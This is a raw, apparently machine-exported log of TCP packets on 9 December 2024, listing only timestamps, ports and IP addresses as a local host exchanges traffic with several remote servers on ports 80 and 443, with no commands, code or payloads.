                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503494024 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503509998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503521919 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503524065 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503534079 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503534079 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503546000 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503556967 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.503592968 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504390001 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504401922 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504412889 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504425049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504436970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504440069 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504447937 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504460096 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504479885 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504493952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.504517078 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505234003 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505247116 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505259991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505273104 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505294085 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505325079 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505626917 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505639076 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.505673885 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.513722897 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.513737917 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.514005899 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.532728910 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.532779932 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533037901 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533087969 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533308983 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533404112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533443928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533617020 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533654928 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533837080 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533849001 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533875942 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.533894062 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534159899 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534169912 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534200907 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534224987 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534276962 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534295082 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534379959 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534430027 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534440041 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534471989 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534550905 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534571886 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534693956 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534709930 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534832954 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534858942 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534872055 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534877062 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534975052 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.534998894 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535001040 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535018921 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535032034 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535043955 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535160065 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535178900 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535284996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.535972118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536024094 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536293983 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536552906 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536659002 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536726952 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536797047 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.536838055 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.578490973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.578563929 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.579340935 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.579770088 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.579813004 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.579832077 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.627332926 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.627419949 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:28.671330929 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.112884998 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.113223076 CET4991680192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.232709885 CET8049916185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.232755899 CET8049892185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.232781887 CET4991680192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.232819080 CET4989280192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.235374928 CET4991680192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.355012894 CET8049916185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.911626101 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.911664963 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.911748886 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.912781954 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:31.912796021 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.579668999 CET8049916185.215.113.43192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.579782009 CET4991680192.168.2.6185.215.113.43
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.581546068 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.582061052 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.701800108 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.701906919 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.702883005 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.702975988 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.703397036 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.822745085 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.960542917 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.960625887 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.960695028 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.960823059 CET49905443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.960839987 CET44349905172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.992185116 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.992214918 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.992302895 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.992619991 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:32.992635012 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.154827118 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.154989004 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.158480883 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.158502102 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.158755064 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.215465069 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.216000080 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.216027021 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:33.216098070 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035660982 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035710096 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035789013 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.035828114 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036247969 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036258936 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036268950 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036294937 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.036328077 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037116051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037159920 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037188053 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037197113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037225008 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.037236929 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038042068 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038081884 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038261890 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.038306952 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141412020 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141525030 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141575098 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141746044 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141761065 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141772032 CET49921443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.141777039 CET44349921104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.155591011 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.155667067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.155833006 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.155877113 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.159687996 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.159753084 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.161420107 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.161453009 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.161648035 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.161684990 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.228627920 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.228679895 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.228852034 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.228893995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.232274055 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.232364893 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.232938051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.232995033 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.233115911 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.233161926 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.241236925 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.241275072 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.241374016 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.241420031 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.249593973 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.249644041 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.249711037 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.249751091 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.258018017 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.258059025 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.258099079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.258138895 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.264858961 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.264877081 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.265189886 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266274929 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266299009 CET49924443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266355038 CET44349924172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266413927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266458988 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266634941 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.266674042 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.274707079 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.274749994 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.274862051 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.274900913 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.283139944 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.283185005 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.283826113 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.283864975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.291343927 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.291393995 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.291477919 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.291563034 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.299140930 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.299185991 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.299592018 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.299633980 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.306665897 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.306713104 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.372334003 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.372347116 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.372428894 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.372996092 CET49930443192.168.2.6104.21.48.1
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.373007059 CET44349930104.21.48.1192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.394376040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.394426107 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.394524097 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.394560099 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.398065090 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.398113012 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.420595884 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.420650959 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.420948982 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.420988083 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.422842026 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.422884941 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.423063040 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.423104048 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.427270889 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.427318096 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.429187059 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.429228067 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.429677010 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.429718018 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.433470011 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.433514118 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.434456110 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.434495926 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.437896967 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.437937975 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.438975096 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.439014912 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.442512035 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.442581892 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.442689896 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.442729950 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.446775913 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.446815014 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.446934938 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.446974993 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.451351881 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.451399088 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.451534986 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.451580048 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.455758095 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.455806971 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.455898046 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.455939054 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.460267067 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.460308075 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.460377932 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.460416079 CET4992380192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.464714050 CET8049923185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:34.464757919 CET4992380192.168.2.6185.215.113.16
